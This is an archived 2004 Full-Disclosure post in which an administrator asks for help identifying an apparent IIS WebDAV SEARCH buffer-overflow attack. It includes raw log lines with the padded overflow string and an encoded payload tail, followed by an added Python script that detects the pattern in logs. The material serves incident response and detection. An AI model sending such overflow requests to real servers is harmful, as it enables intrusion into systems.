[Full-Disclosure] Exploit Identification Request

From: System Administrator (root_at_transientimages.com)
Date: 04/29/04

    To: <full-disclosure@lists.netsys.com>
    Date: Thu, 29 Apr 2004 06:34:41 -0700
    
    

    Folks :

    One of our external systems (W2k, fully patched all components -
    sp4, sql sp4, mdac sp3, post hotfixes, etc) is being hit by what
    appears to be a buffer overflow of IIS : 4096 bytes cycling in
    what appears to be an attempt to execute code. The probe starts by
    obtaining an index.asp page, and then drops a "SEARCH / 411 210
    42" before dropping the "AAAAA<n>" string.

    I've checked the SEARCH unicode against google (nothing) and
    k-otic's current exploits (nada) and dshield tables (nada).

    Can anyone assist in identification of the exploit/overrun attempt?

    Thanks,
    Oliver

    2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189
    Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
    2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -
    2004-04-28 21:12:45 x.x.88.247
    SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA?????????????????????????????????????####??????????
    rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
    mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
    ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
    kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
    kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
    oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
    dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
    dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
    ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
    hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd
    2004-04-28 21:12:51 217.185.88.247
    SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAA?????????????????????????????????????####??????????
    rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
    mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
    ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
    kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
    kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
    oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
    dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
    dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
    ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
    hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
    2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189
    Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
    2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - -
    2004-04-28 21:13:27 217.185.198.113
    SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAA?????????????????????????????????????####??????????
    rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
    mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
    ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
    kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
    kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
    oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
    dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
    dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
    ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
    hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
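The log excerpt above shows a recognisable three-step shape per client: a GET of index.asp, a bare SEARCH that IIS answers with 411 (Length Required), then a SEARCH whose URI is several kilobytes of one repeated byte followed by an encoded tail. The triage script below, added here as an editor's example and not part of the original post, parses IIS 5.0 W3C lines in the same field order as the poster's log, flags requests by non-standard method, URI length and repeated-byte run, and correlates the 411 probe with the later padded SEARCH from the same client. The sample lines, the private IP addresses, the status code on the padded request (the post's wrapped lines do not show it) and the two thresholds are all constructed assumptions.

```python
"""Triage IIS W3C log lines for the probe-then-padded-SEARCH pattern.

Field order matches the poster's IIS 5.0 extended log:
date time c-ip cs-method cs-uri-stem sc-status sc-bytes cs-bytes cs(User-Agent) cs(Referer)
"""
from collections import defaultdict

FIELDS = ("date", "time", "ip", "method", "uri", "status",
          "sc_bytes", "cs_bytes", "ua", "referer")

SAFE_METHODS = {"GET", "POST", "HEAD", "OPTIONS"}
LONG_URI = 1024   # assumed threshold; the post reports ~4096-byte URIs
SLED_RUN = 64     # assumed: a run this long of one byte is padding, not a path

# Constructed sample log. The padded URI is built here, not copied from the
# post; the 400 status on it is an assumption (the post does not show one).
PAYLOAD = "/" + "A" * 2500 + "?" * 40 + "####" + "rmom" + "d" * 200
SAMPLE_LOG = "\n".join([
    "2004-04-28 21:12:38 10.0.0.247 GET /index.asp 200 0 189 "
    "Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -",
    "2004-04-28 21:12:38 10.0.0.247 SEARCH / 411 210 42 - -",
    f"2004-04-28 21:12:45 10.0.0.247 SEARCH {PAYLOAD} 400 0 4200 - -",
    "2004-04-28 21:13:01 10.0.0.113 GET /index.asp 200 0 189 "
    "Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -",
    "2004-04-28 21:13:04 10.0.0.113 SEARCH / 411 210 42 - -",
    "2004-04-28 21:14:10 10.0.0.5 GET /index.asp 200 0 189 "
    "Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) -",
])


def parse_line(line):
    """Split one W3C line into a dict; returns None for short/blank lines."""
    parts = line.split()
    if len(parts) < 8:
        return None
    return dict(zip(FIELDS, parts))


def longest_run(s):
    """Length of the longest run of one repeated character in s."""
    best = cur = 0
    prev = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best


def classify(rec):
    """Reasons a single request looks suspicious (empty list if none)."""
    reasons = []
    if rec["method"] not in SAFE_METHODS:
        reasons.append(f"non-standard method {rec['method']}")
    if len(rec["uri"]) >= LONG_URI:
        reasons.append(f"uri length {len(rec['uri'])}")
    run = longest_run(rec["uri"])
    if run >= SLED_RUN:
        reasons.append(f"repeated-byte run of {run}")
    return reasons


def payload_sequence(recs):
    """True when a client sent a bare SEARCH answered 411 and later a SEARCH
    with a long, padded URI, i.e. the order seen in the post."""
    saw_probe = False
    for r in recs:  # recs are in log (time) order
        if r["method"] == "SEARCH" and r["status"] == "411":
            saw_probe = True
        elif (saw_probe and r["method"] == "SEARCH"
              and len(r["uri"]) >= LONG_URI
              and longest_run(r["uri"]) >= SLED_RUN):
            return True
    return False


def triage(log_text):
    """Group by client IP; return per-IP hits and whether the full sequence
    was observed. Clients with no suspicious request are omitted."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in by_ip.items():
        hits = [(r["time"], r["method"], classify(r)) for r in recs
                if classify(r)]
        if hits:
            findings[ip] = {"hits": hits, "sequence": payload_sequence(recs)}
    return findings


if __name__ == "__main__":
    for ip, f in triage(SAMPLE_LOG).items():
        print(ip, "full probe+payload sequence" if f["sequence"] else "partial")
        for t, m, why in f["hits"]:
            print("  ", t, m, "; ".join(why))
```

The sequence check is what separates a scanner that only sends the bare SEARCH (answered 411, as the second client does here) from one that went on to deliver the padded request; the per-request reasons are kept so the analyst can see which rule fired. The script does not name the vulnerability being targeted, since the post itself leaves that open.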

